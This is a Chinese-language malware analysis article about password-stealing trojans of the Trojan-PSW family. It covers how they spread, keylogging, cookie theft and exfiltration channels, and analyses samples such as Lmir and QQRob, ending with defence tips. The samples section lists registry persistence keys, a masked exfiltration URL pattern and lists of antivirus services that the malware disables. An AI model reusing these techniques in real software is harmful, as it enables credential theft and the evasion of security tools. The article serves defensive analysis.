揭開盜竊狂魔Trojan-PSW木馬面紗

QQ上廣泛傳播地各種回答問題得到q幣中獎消息中， 其中部分所包含著惡意鏈接， 訪問該鏈接將導致用戶電腦感染多種木馬程序， 經過仔細分析這些木馬幾乎都歸于一類——Trojan-PSW木馬!

　　一、Trojan-PSW木馬的定義

　　近年來， 網絡犯罪和破壞更加趨向于能夠給攻擊者帶來直接或間接的經濟利益， 像之前對純技術的追求已經不那么明顯， 而隨著黑客技術和黑客工具的普及， 使得網絡犯罪與破壞的技術門檻降低， 許多不法分子利用這些技術進行非法牟利， 其中最突出的表現就是Trojan-PSW木馬的大肆傳播。

　　在用戶不注意的情況下， 將木馬程序植入用戶電腦， 自動獲取預先指定好的、木馬所有者所感興趣的用戶敏感信息資料， 并通過木馬程序將非法竊取的資料發(fā)送給木馬所有者， 這樣的木馬程序通常盜取銀行帳號、網絡游戲帳號、信用卡卡號等以及對應密碼， 因此被歸類于Trojan-PSW木馬。

　　Trojan-PSW木馬是隨著網絡發(fā)展而出現的， 當人們感受到計算機以及互聯(lián)網給日常生活帶來的便利后， 開始傾向于將一些敏感的信息存儲在電腦上或者通過電腦進入互聯(lián)網發(fā)送這些信息， 這樣就給了不法份子進行“網絡盜竊”的條件。 他們開始設計一種惡意程序， 并通過各種各樣的方式植入用戶電腦， 從中搜索自己需要的資料或者直接截取到用戶輸入的信息， 記錄下來后轉發(fā)給自己， 然后利用盜取的資料從事非法牟取暴利活動。 此類木馬往往不需要太多的技術含量， 可能利用一些系統(tǒng)漏洞進入用戶系統(tǒng)， 不過大多數情況下， 是通過誘騙用戶點擊某個網站鏈接， 或者直接通過即時聊天工具發(fā)送木馬程序給用戶， 當用戶運行木馬程序或者訪問過惡意鏈接后就會間接感染該木馬。

　　二、Trojan-PSW木馬的特點

　　Trojan-PSW木馬在網絡上已經出現了好幾年， 而且引發(fā)的安全事件以及犯罪行為都在不斷增加， 其破壞不容小覷。

　　究竟該類木馬如何植入用戶電腦?

　　如何在用戶電腦中獲取到敏感信息呢?

　　究竟木馬作者所感興趣的敏感信息有哪些?

　　當獲取到信息后， 又是如何將信息發(fā)送給木馬所有者呢?

　　下面就是總結出的一些Trojan-PSW木馬特點：

　　1.利用“社會工程學”等手段侵入用戶電腦

　　木馬相對于蠕蟲來說， 缺乏主動傳播性， 木馬的所有傳播行為都是有人為參與， 而不像蠕蟲那樣不需要人工干預， 可以自發(fā)地搜索可感染目標。 再有木馬比較有針對性， 通常是種一對一或者一對多的入侵行為， 而蠕蟲是一種無法預測、不能控制的多對多的入侵。

　　由于木馬的這樣特點， 使得木馬的傳播與其他病毒有一定的區(qū)別， 但大多都利用了一些“社會工程學”的技巧：

　　(1)利用系統(tǒng)漏洞直接傳播

　　用戶電腦本身存在系統(tǒng)漏洞， 如操作系統(tǒng)漏洞或者是IE瀏覽器漏洞等， 都可以被不法分子利用， 直接將木馬程序復制或者下載到用戶電腦并進行安裝。

　　(2)利用即時聊天工具誘惑傳播

　　據統(tǒng)計， 這種傳播方式最為有效， 也是木馬所有者慣用伎倆， 即時聊天工具的普及給了他們傳播木馬程序的媒介， 且利用了人們的好奇、貪小便宜的心理以及對好友不設防的薄弱思想， 通過發(fā)送一段具有誘惑性內容的消息， 附帶一個鏈接， 誘使用戶點擊訪問。 一旦訪問， 就會自動將木馬程序下載到用戶機器并運行起來。 (3)利用網站、論壇欺騙傳播

　　木馬程序所有者通常會在一些音樂網站或者知名論壇發(fā)布一些虛假消息， 如一些小工具、惡意網站地址， 欺騙用戶說可以獲取何種利益， 其中就安放了一些木馬程序， 等待用戶下載運行。

　　(4)利用電子郵件強行傳播

　　木馬所有者發(fā)送附帶木馬程序的電子郵件， 郵件主題比較吸引人， 使用戶瀏覽附件， 從而感染木馬。

　　2.竊取敏感資料的方法

　　木馬程序成千上萬， 但其竊取資料的手段大致可以歸類為以下幾條：

　　(1)搜索文件

　　通常重要的信息可能存在幾類文件中， 比如.txt文本、.doc文檔、.xls表格等等， 那么木馬作者可能就會讓木馬程序自動搜索用戶電腦上可能記錄了關鍵信息的文件， 從中獲取字符串， 并記錄在自己的日志文件里;此外竊取密碼的木馬針對性比較強， 如針對于某一個網絡游戲、某一種商業(yè)軟件， 其記錄關鍵信息的位置往往也固定于一些文件之中， 通過遍歷文件， 搜索其中關鍵字符， 也同樣能夠獲取到有用信息。

　　(2)鍵盤截取

　　這類木馬功能較為簡單， 不針對各類文件， 而直接針對于用戶輸入信息的關鍵設備——鍵盤。 木馬運行后， 會將用戶敲擊鍵盤的順序和內容記錄下來， 存為一個文本， 其中可能就包括了用戶的一些常用的帳號和密碼， 成功率也比較高。

　　(3)檢測有效窗口

　　當木馬檢測到某個程序的窗口為當前有效窗口時， 其會啟動記錄功能， 將用戶輸入到窗口的信息完整記錄下來， 例如檢測傳奇客戶端窗口。

　　(4)查找cookie信息

　　用戶在登陸一些網頁時會產生一些cookie信息， 其中可能包含了一些像用戶名及密碼一類的關鍵信息， 木馬程序會讀取cookie文件， 從而獲得有效信息。

　　3.竊取信息的種類

　　前面提到Trojan-PSW木馬的使用通常為了獲取非法的經濟利益， 這些經濟利益的來源就是木馬做竊取到的重要信息資料， 安天CERT整理近幾年Trojan-PSW木馬所涉及到的敏感信息資料：

　　(1)網絡銀行類

　　像工商銀行、交通銀行、商業(yè)銀行、招商銀行、農業(yè)銀行、中國銀行等指明國內銀行的帳號密碼以及信用卡等業(yè)務的相關資料。

　　國外的情況也類似， 主要設計到集中信用卡的信息竊取， 如Visa、MasterCard等。 (2)網絡游戲類

　　隨著網絡游戲近幾年的飛速發(fā)展， 其擁有的玩家也越來越多， 游戲所制造的網上財富也日益增加， 一時間， 大量木馬瞄準了這塊風水寶地。 因此也出現了大量針對于網絡游戲的木馬， 像傳奇盜號的木馬已經成為一個家族——Trojan-PSW.Win32.Lmir， 變種不計其數。 通過獲取玩家的游戲帳號和密碼， 木馬所有者或將玩家人物角色賣出， 或將玩家高級裝備在游戲中出售， 從而獲取高額“利潤”。 通常他們都是在獲得該裝備后， 迅速把裝備轉移到他在該區(qū)申請的游戲帳號上面， 進行黑貨轉移， 并迅速以現金進行交易， 等游戲玩家申請完， 整個交易已經早早的交易完畢， 這同時也指出了網絡法定關于虛擬財產方面的定罪的空白。

　　(3)網絡通行證類

　　通常指一些論壇或者電子郵箱的登陸帳號和密碼， 竊取這些帳號后， 能夠獲得其中的有價值資源， 或者冒充被盜人進行一些非法活動。

　　(4)聊天工具類

　　諸如QQ、MSN等著名聊天工具， 也是此類木馬及木馬作者垂涎的獵物， 一個好的QQ號碼能夠在網上賣到很高的價錢， 這其中的利益就是他們行竊的原動力。

　　(5)商業(yè)機密類

　　商業(yè)競爭激烈， 如果能夠獲得對手的關鍵資料， 那么就可能贏得一場艱難的商業(yè)戰(zhàn)， 而木馬獲取商業(yè)機密類信息所“賺”來的利潤也是最高的。

　　(6)大型軟件類

　　木馬所有者可能會去針對某款正版軟件的序列號或者某游戲的CD-KEY進行盜竊， 將這些資源賣給那些想使用正版， 但苦于不能注冊的用戶。

　　4.信息回收方式

　　當木馬竊取到大量信息后， 會在用戶電腦產生記錄， 隨后會通過幾種常用的方式發(fā)送給木馬的“主人”， 我們稱之為信息回收過程， 下面就是幾種木馬常用的信息回送方式：

　　(1)HTTP服務器

　　木馬所有者建立一個HTTP服務器， 接受從木馬程序反饋回的消息， 通常木馬程序使用get方式將消息發(fā)到服務器。

　　(2)FTP服務器

　　木馬所有者通常會在一臺電腦上搭建一個FTP服務器， 并配上公網IP， 然后在自己的木馬程序中事先設定好， 這個服務器地址。 一旦木馬獲取到資料后， 就主動連接此服務器， 將資料上傳， 而無須人工操作。

　　(3)SMTP服務器

　　木馬所有者會在木馬程序中設置一段代碼完成發(fā)送電子郵件功能， 將記錄信息以電子郵件的方式發(fā)送到病毒所有者的郵箱中， 或直接將信息寫為郵件正文， 或作為附件進行發(fā)送。

　　(4)TFTP服務器

　　類似于FTP服務器， 只不過類型不一樣， 此類服務器上傳小文件， 尤其像記錄少量信息的文本文件， 有一定的速度優(yōu)勢。

　　(5)IRC服務器

　　通過IRC服務器中的DCC命令也可以傳送文件， 木馬所有者預先告訴木馬當獲得信息后連接到某個特定的IRC地址， 并使用DCC命令將文件發(fā)送到所有者手上。

　　(6)后門功能

　　類似于后門程序， 在感染該木馬的電腦上開啟一個端口， 或者直接架設一個上面(1)、(2)、(3)中提到的服務器， 等待用戶自行下載木馬文件。

三、典型Trojan-PSW木馬分析

　　1.Trojan-PSW.Win32.Lmir.lq(傳奇天使)

　　病毒標簽：

　　病毒名稱： Trojan-PSW.Win32.Lmir.lq

　　中文名稱： 傳奇天使

　　病毒類型： 木馬

　　危害等級： 中

　　文件長度： 62,525 字節(jié)

　　感染系統(tǒng)： windows9x以上的所有版本

　　編寫語言： Microsoft Visual C++

　　病毒描述：

　　傳奇天使是專門盜取傳奇賬號的木馬， 感染后傳奇天使后， 該病毒會竊取傳奇玩家的 區(qū)名稱和ID名稱， 密碼， 及登陸服務器。 感染該病毒后會在系統(tǒng)目錄下生成病毒相關文件winker.exe或 winker.dll， 搜索反病毒及安全軟件的進程， 找到后便將該進程中止， 通過修改注冊表， 啟動服務， 并隨系統(tǒng)同時啟動。

　　行為分析：

　　1)修改注冊表

　　HKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\open\command

　　添加鍵值："默認"="%Windir%winker.exe"從而達到隨系統(tǒng)啟動的目的。

　　2)在系統(tǒng)目錄下釋放文件winker.exe或winker.dll。

　　3)關閉如下進程：天網防火墻個人版， 金山網鏢2003， 瑞星殺毒軟件。

　　4)修改注冊表， 調用kernerl32.dll的RegisterServiceProccess， 從而注冊為服務。

　　2.“網銀大盜”

　　病毒名稱：網銀大盜Ⅱ

　　病毒類型：木馬

　　病毒大�。�16284字節(jié)

　　傳播方式：網絡

　　壓縮方式：ASpack

　　該木馬盜取幾乎涵蓋中國當時所有個人網上銀行的帳號、密碼、驗證碼等等， 發(fā)送給病毒作者。 此木馬與4月份截獲網銀大盜有異曲同工之處， 但涉及銀行之多， 范圍之廣是歷來最大的， 不但給染毒用戶造成的損失更大、更直接， 也給各網上銀行造成更大的安全威脅和信任危機。 具體技術特征如下：

　　(1)病毒運行后， 盜取的網上銀行涉及：

　　銀聯(lián)支付網關-->執(zhí)行支付

　　銀聯(lián)支付網關

　　中國工商銀行新一代網上銀行

　　中國工商銀行網上銀行

　　工商銀行網上支付

　　申請牡丹信用卡

　　招商銀行個人銀行

　　招商銀行一網通

　　個人網上銀行

　　中國建設銀行網上銀行

　　登陸個人網上銀行

　　中國建設銀行

　　中國建設銀行網上銀行

　　交通銀行網上銀行

　　交通銀行網上銀行

　　深圳發(fā)展銀行帳戶查詢系統(tǒng)

　　深圳發(fā)展銀行　個人銀行

　　深圳發(fā)展銀行 　 個人用戶申請表

　　深圳發(fā)展銀行：

　　民生網個人普通版

　　民生銀行

　　網上銀行--個人普通業(yè)務

　　華夏銀行

　　上海銀行企業(yè)網上銀行

　　上海銀行

　　首都電子商城商戶管理平臺

　　首都電子商城商戶管理：

　　中國在線支付網: :IPAY網上支付中心

　　中國在線支付網商戶

　　招商銀行網上支付中心

　　招商銀行網上支付

　　個人網上銀行-網上支付

　　(2)病毒算機中創(chuàng)建以下文件：

　　%SystemDir%\svch0st.exe， 16284字節(jié)， 病毒本身

　　(3)在注冊表的HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current Version\Run中創(chuàng)建：

　　“svch0st.exe”=“%SystemDir%\svch0st.exe”

　　“taskmgr.exe”=“%SystemDir%\svch0st.exe”(4)病毒運行后會根據IE窗口標題欄判斷是否為網上銀行頁面， 如果發(fā)現上述提到的銀行后， 病毒立即開始記錄鍵盤敲擊的每一個鍵值， 記錄鍵值包括：

　　AabCcDdEeFfGgHhIiJjKkLlMmNnOoPpQQRrSsTtUuVvWwXxYyZz1

　　!2@3#4$5%6^7&8*9(0)

　　{BackSpace}{Tab}{回車}{Shift}{Ctrl}{Alt}{Pause}

　　{Esc}{空格}{End}{Home}{Left}{Right}{Up}{Down}

　　{Insert}{Delete}{Del}{F1} -- {F12}

　　{NumLock}{ScrollLock}{PrintScreen}{PageUp}{PageDown}

　　;:=+,<-_.>/?`~][{\　]}'

　　(5)病毒截取到鍵盤值后， 會形成信息發(fā)到指定http://*****.com/****/get.asp。 其信息如下：

　　http://*****.com/****/get.asp?txt=××銀行：<截獲的按鍵>

　　(6)病毒開啟3個定時器， 每隔幾秒鐘搜索用戶的IE窗口， 如果發(fā)現用戶正在使用上述銀行的“個人網上銀行”的登陸界面， 則嘗試記錄用戶鍵入的所有鍵值， 然后把竊取到的信息通過get方式發(fā)送到指定的服務器。

　　3.“證券大盜”

　　該木馬可以盜取多家證券交易系統(tǒng)的交易帳號和密碼。

　　具體技術特征如下：

　　(1)病毒運行后， 將創(chuàng)建自身復本于：

　　%WinDir%\SYSTEM32.EXE, 201216字節(jié)

　　(2)在注冊表中添加下列啟動項：

　　[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

　　"System"=%WinDir%\SYSTEM32.EXE

　　(3)木馬運行時尋找一些包含著名券商名稱的窗口標題， 如果發(fā)現就開始啟動鍵盤鉤子對用戶登陸信息進行記錄， 包括用戶名和密碼。

　　(4)在記錄鍵盤信息的同時， 通過屏幕快照將用戶登陸時窗口畫面保存為圖片， 存放于：

　　c:\Screen1.bmp

　　c:\Screen2.bmp(5)當記錄指定次數后， 將3， 4中記錄的信息和圖片通過電子郵件發(fā)送到webmaster@****.com。

　　(6)發(fā)送成功后， 病毒將自身刪除， 但4中生成的.bmp圖片并未被刪除。 4.Trojan-PSW.Win32.QQRob(啊啦大盜)

　　啊啦大盜是一個竊取QQ密碼的經典木馬程序， 當感染該病毒后， 會出現無故彈出一些網頁廣告， 使得某些反病毒軟件不能正常運行， QQ密碼丟失等現象。

　　具體行為分析：

　　1.該木馬隱藏于一個畸形的CHM文件中， 打開這個CHM文件， 木馬就會被自動釋放出來并且得到執(zhí)行;

　　2.木馬被釋放到%SYSTEM%目錄， 名為“NTdhcp.exe”， 具有“隱藏”、“系統(tǒng)”和“只讀”屬性;

　　3.修改注冊表， 在注冊表啟動項

　　HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\CurrentVersion\Run下，

　　添加如下值："NTdhcp"="%SYSTEM%\NTdhcp.exe"

　　4.刪除大量反病毒軟件的在注冊表啟動項中的值：

　　KAVPersonal50RavMonRavTimerKvMonXPiDuba Personal FireWall

　　KAVRunKpopMonKulansynKavPFWccAppSSC_UserPromptNAV CfgWiz

　　MCAgentExeMcRegWizMCUpdateExeMSKAGENTEXEMSKDetectorExe

　　VirusScan OnlineVSOCheckTaskNetwork Associates Error Reporting Service

　　KavStartKWatch9x

　　5.設置注冊表中下列各項的“Start”值為4， 從而禁止這些反病毒服務程序：

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsRavMon

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RsCCenter

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kavsvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KVSrvXP

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KPfwSvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KWatchSvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNDSrvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccProxy

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccEvtMgr

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ccSetMgr

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SPBBCSvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Symantec Core LC

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\navapsvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NPFMntor

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MskService

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FireSvc

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McShield

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McTaskManager

　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\McAfeeFramework

       6.監(jiān)視禁止以下反病毒進程：

　　FireTray.exe UpdaterUI.exe TBMon.exe SHSTAT.EXE RAV.EXE RAVMON.EXE

　　RAVTIMER.EXE KVXP.KXP KVCENTER.KXP Iparmor.exe MAILMON.EXE

　　KAVPFW.EXE KmailMon.EXE KAVStart.exe KATMain.EXE TrojanDetector.EXE

　　KVFW.EXE KVMonXP.KXP KAVPLUS.EXE KWATCHUI.EXE KPOPMON.EXE

　　KAV32.EXE CCAPP.EXE MCAGENT.EXE MCVSESCN.EXE MSKAGENT.EXE

　　EGHOST.EXE KRegEx.exe TrojDie.kxp KVOL.exe kvolself.exe KWatch9x.exe

　　四、Trojan-PSW木馬防范

　　Trojan-PSW木馬的出現標志著網絡攻擊事件已經不再是單純的技術突破， 而更傾向于經濟利益的獲取， 如何去防范這類木馬的破壞行為已經成為人們日益關注的問題了。

　　1.保持高度的警惕性， 不要輕易點擊網上的鏈接， 在接受到文件后， 先使用殺毒軟件進行檢查。

　　2.經常檢查電腦狀態(tài)， 是否有可疑進程運行、是否有不熟悉的文件、啟動項和注冊表鍵值、是否有不正常的網絡連接行為、是否被開放不熟悉的端口等。

　　3.妥善存儲帳號密碼一類的敏感信息資料。

　　4.在做網上交易的時候， 盡量使用軟鍵盤操作， 有能力的， 還是建議使用銀行開發(fā)出的u盾或其他移動存儲設備。

　　5.不去訪問一些小的網站， 以免被種植上木馬， 勤升級病毒庫和及時打微軟或linux系統(tǒng)的補丁。

　　綜述：

　　隨著個人利益的追求最大話， 越來越多的技術性選手開始走向黑色經濟那邊， 他們將更多的木馬和底層黑客工具進行捆綁， 開發(fā)出免殺的dll木馬并和盜號木馬進行合并， 組成新型的黑客攻擊工具。 從以上的這些分析的數據來看， 對手的編寫水平是在突飛猛進的增長， 對我們也是一個強大的考驗， 這種盜號木馬的出現， 更說明了他的背后有很廣闊的市場， 有很強大的地下交易市場， 所謂治病需除根， 呼吁有關部門還是要嚴查這些地下市場， 切斷其根部， 斷了它那源源不斷的黑色血液， 在這里也給那些剛出校門的或者還在校園里面， 平時喜歡使用一些黑客工具的人， 從最近幾個朋友給我聊天和詢問的情況來看， 紅狼小組開發(fā)的這個遠程控制很受歡迎， 對于個人用戶來說十分有效， 但是， 在這里我忠心的告訴你們， 不要以為會玩幾個黑客工具就能當黑客， 真正的黑客根本不會去無聊到黑個人機器， 學校服務器等， 可能由于一些愛好和興趣， 早先黑過一些機器， 但是黑完以后他也要面臨巨大的代價， 請你們把精力用在學習上， 不要幻想著開發(fā)一個病毒， 黑下一個知名站點而覺得能一下成名， “錢”途無量。

　　同時針對這樣的盜號木馬我和安天的cert小組也配套開發(fā)出了一些專用檢查工具， 在這里我還是要感謝安天cert全體小組成員的大力支持和幫助， 也要感謝誠信網安團隊成員能積極的對一些用戶提交的可疑病毒進行逆向分析， 在短時間內完成專殺工具的開發(fā)， 還要感謝我身邊的王清、王琪兩個兄弟的幫忙